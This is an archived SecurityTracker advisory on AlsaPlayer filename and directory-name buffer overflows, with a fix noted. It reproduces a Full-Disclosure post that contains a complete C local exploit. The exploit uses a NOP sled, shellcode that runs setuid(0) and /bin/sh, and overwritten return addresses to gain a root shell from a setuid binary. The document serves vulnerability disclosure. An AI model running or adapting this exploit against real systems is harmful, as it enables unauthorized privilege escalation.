SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Multimedia)  >   AlsaPlayer Vendors:   Alsaplayer.org
AlsaPlayer PCM Audio Player Buffer Overflow May Let Local Users Gain Elevated Privileges
SecurityTracker Alert ID:  1005265
SecurityTracker URL:  http://securitytracker.com/id/1005265
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Sep 21 2002
Impact:   Execution of arbitrary code via local system, User access via local system
Fix Available:  Yes  Vendor Confirmed:  Yes  

Description:   Several buffer overflows were reported in the AlsaPlayer PCM audio player software. A local user may be able to obtain elevated privileges.

It is reported that there are buffer overflows in the processing of file names and directory names. A local user could execute AlsaPlayer with a specially crafted command line string to trigger a buffer overflow and execute arbitrary code on the system.

According to the report, some installations of AlsaPlayer may be configured with set user id (setuid) privileges, particularly for debugging purposes. If the binary is configured with setuid privileges, the local user could gain elevated privileges on the system.

A demonstration exploit script is provided in the Source Message.

Impact:   A local user can execute arbitrary code, possibly with elevated privileges (depending on the permissions of the binary).
Solution:   The vendor has released a fix in the CVS version, available at:

http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/alsaplayer/alsaplayer/app/Main.cpp.diff?r1=1.66&r2=1.67

Vendor URL:  alsaplayer.org/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] Alsasound local b0f (not an issue if not setuid root)


This is a multi-part message in MIME format.
--------------000403030209070703060000
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

I noticed that it is very common in the troubleshooting of an 
application that uses alsa-sound to set the setuid bit on the binary in 
question. One example of this can be found in the archives of the 
alsaplayer mailing list: 
http://lists.tartarus.org/pipermail/alsaplayer-devel/2002-February/000656.html 
and
http://lists.tartarus.org/pipermail/alsaplayer-devel/2002-February/000657.html

I spoke to the developer of alsasound and he promptly fixed the 
problems. Although he does not condone the setuid bit on the alsasound 
program the author noted that some users choose to set the bit.

The fixes for the above problem can be found at: 
http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/alsaplayer/alsaplayer/app/Main.cpp.diff?r1=1.66&r2=1.67

http://alsaplayer.org/changelog.php3

Wed Sep 18 11:52:43 CEST 2002
-----------------------------
* Code cleanups
* JACK related updates
* commandline buffer overflow fixes.
...


-KF





--------------000403030209070703060000
Content-Type: text/plain;
 name="alsaplayer-suid.c"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="alsaplayer-suid.c"

/* 
 * Alsaplayer exploit for a buffer overflow found by KF (snosoft.com) 
 * 
 * This program is not installed with special permissions by default. 
 * However, the author himself does recommend to do so under certain 
 * conditions:
 *
 * http://lists.tartarus.org/pipermail/alsaplayer-devel/2002-February/000656.html
 * http://lists.tartarus.org/pipermail/alsaplayer-devel/2002-February/000657.html
 *
 * Author: zillion[at]safemode.org (09/2002)
 *
 * Tested on Red Hat 7.3 linux with alsaplayer-devel-0.99.71-1
 *
 */

#include <unistd.h>
#include <sys/stat.h>
#include <string.h>

#define BUFFER_SIZE 1056
#define NOP 0x90
#define RET 0xbfffe440 

char shellcode[]=

"\xeb\x26\x5e\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb0\xa4\xcd\x80" 
"\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xd5\xff\xff\xff"
"\x2f\x62\x69\x6e\x2f\x73\x68"; 

void print_error(char * burb) { 
  printf(" Error: %s !\n",burb); exit(0); 
}

void usage(char *progname) {
  printf("\n*--- -- -  Alsaplayer b0f exploit - -- ---*\n");
  printf("\nDefault: %s  -f /path/to/alsaplayer",progname);
  printf("\nOption : %s  -o <offset>\n\n",progname);
  exit(0);
}

int main(int argc, char **argv){
  
  char buffer[BUFFER_SIZE];
  char file[30];
  long retaddress;
  int arg,offset=500;
  
  struct stat sbuf;
  
  if(argc < 2) { usage(argv[0]); }
  
  while ((arg = getopt (argc, argv, "f:o:")) != -1){ 
    switch (arg){ 
    case 'f': 
      strncpy(file,optarg,sizeof(file));
      if(stat(argv[2], &sbuf)) { print_error("No such file");}
      break; 
    case 'o':       
      offset = atoi(optarg);
      if(offset < 0) { print_error("Offset must be positive");}
      break; 
    default :       
      usage(argv[0]); 
    } 
  } 
  
  retaddress = (RET - offset);
  memset(buffer,NOP,BUFFER_SIZE);
  memcpy(buffer + BUFFER_SIZE - (sizeof(shellcode) + 8) ,shellcode,sizeof(shellcode) -1);
  
  /* Overwrite EBP and EIP */
  *(long *)&buffer[BUFFER_SIZE - 8]  = retaddress;
  *(long *)&buffer[BUFFER_SIZE - 4]  = retaddress;
  
  if(execl(file,file,"-p",buffer,NULL) != 0) {
    print_error("Could not execute alsaplayer ");
  }
  
  return 0;
  
}

--------------000403030209070703060000--

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC